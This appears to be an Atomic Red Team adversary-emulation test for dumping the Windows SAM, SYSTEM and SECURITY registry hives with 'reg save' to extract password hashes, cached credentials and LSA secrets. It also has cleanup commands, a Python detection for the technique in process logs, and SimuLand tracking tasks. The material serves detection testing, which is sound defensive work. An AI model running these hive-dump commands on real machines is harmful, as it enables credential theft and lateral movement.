Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys, then processed locally using https://github.com/Neohapsis/creddump7.
Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
Supported Platforms: Windows
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Cleanup Commands:
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
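To confirm the test actually fires your telemetry, the following added detection (not part of the Atomic Red Team test) scans process-creation records (the CommandLine field of Sysmon Event ID 1 or Security 4688, assumed field names) for `reg save` of the SAM, SYSTEM or SECURITY hives; the sample records are constructed.

```python
import re
from dataclasses import dataclass

# Hives whose offline copies yield local hashes, cached credentials and LSA
# secrets: the three saved by this atomic test.
CREDENTIAL_HIVES = {"sam", "system", "security"}

# reg / reg.exe / full path to reg.exe, then "save", then an HKLM hive path
# written as HKLM or HKEY_LOCAL_MACHINE, in any case, optionally quoted.
_REG_SAVE = re.compile(
    r'(?:^|[\\\s"])reg(?:\.exe)?"?\s+save\s+"?'        # reg executable and "save"
    r'(?:hklm|hkey_local_machine)\\(?P<hive>[a-z]+)'   # hive root and top-level hive
    r'(?:\\[^\s"]*)?"?(?=\s|$)',                        # optional subkey, end of argument
    re.IGNORECASE,
)

@dataclass
class Finding:
    record_id: str
    user: str
    hive: str
    command_line: str

def detect_hive_dump(events):
    """Return one Finding per record whose command line saves a credential hive."""
    findings = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        m = _REG_SAVE.search(cmd)
        if m and m.group("hive").lower() in CREDENTIAL_HIVES:
            findings.append(Finding(ev["RecordId"], ev["User"], m.group("hive").lower(), cmd))
    return findings

# Constructed sample records; field names assume a Sysmon EID 1 / 4688 style export.
SAMPLE_EVENTS = [
    {"RecordId": "1001", "User": "CORP\\admin",
     "CommandLine": "reg save HKLM\\sam C:\\Users\\admin\\AppData\\Local\\Temp\\sam"},
    {"RecordId": "1002", "User": "CORP\\admin",
     "CommandLine": "\"C:\\Windows\\System32\\reg.exe\" SAVE HKEY_LOCAL_MACHINE\\Security C:\\tmp\\sec"},
    {"RecordId": "1003", "User": "CORP\\dev",   # benign: application key, not a credential hive
     "CommandLine": "reg save HKLM\\Software\\Contoso C:\\backup\\contoso.hiv"},
    {"RecordId": "1004", "User": "CORP\\dev",   # benign: query only, nothing written to disk
     "CommandLine": "reg query HKLM\\system\\CurrentControlSet\\Services"},
]

if __name__ == "__main__":
    for f in detect_hive_dump(SAMPLE_EVENTS):
        print(f"[{f.record_id}] {f.user} saved hive '{f.hive}': {f.command_line}")
```

Saving a subkey under one of these hives is also flagged, so pair the match with the user and parent process before alerting to keep legitimate backup jobs out of the queue.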
Tasks:
Create an issue in SimuLand GitHub Repo with a request to run this atomic test
Start collaboration with contributors to SimuLand and make sure someone is assigned to the creation of the environment.
Close the ticket and move it to done once the issue is created in the other project and someone is assigned to it.
Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets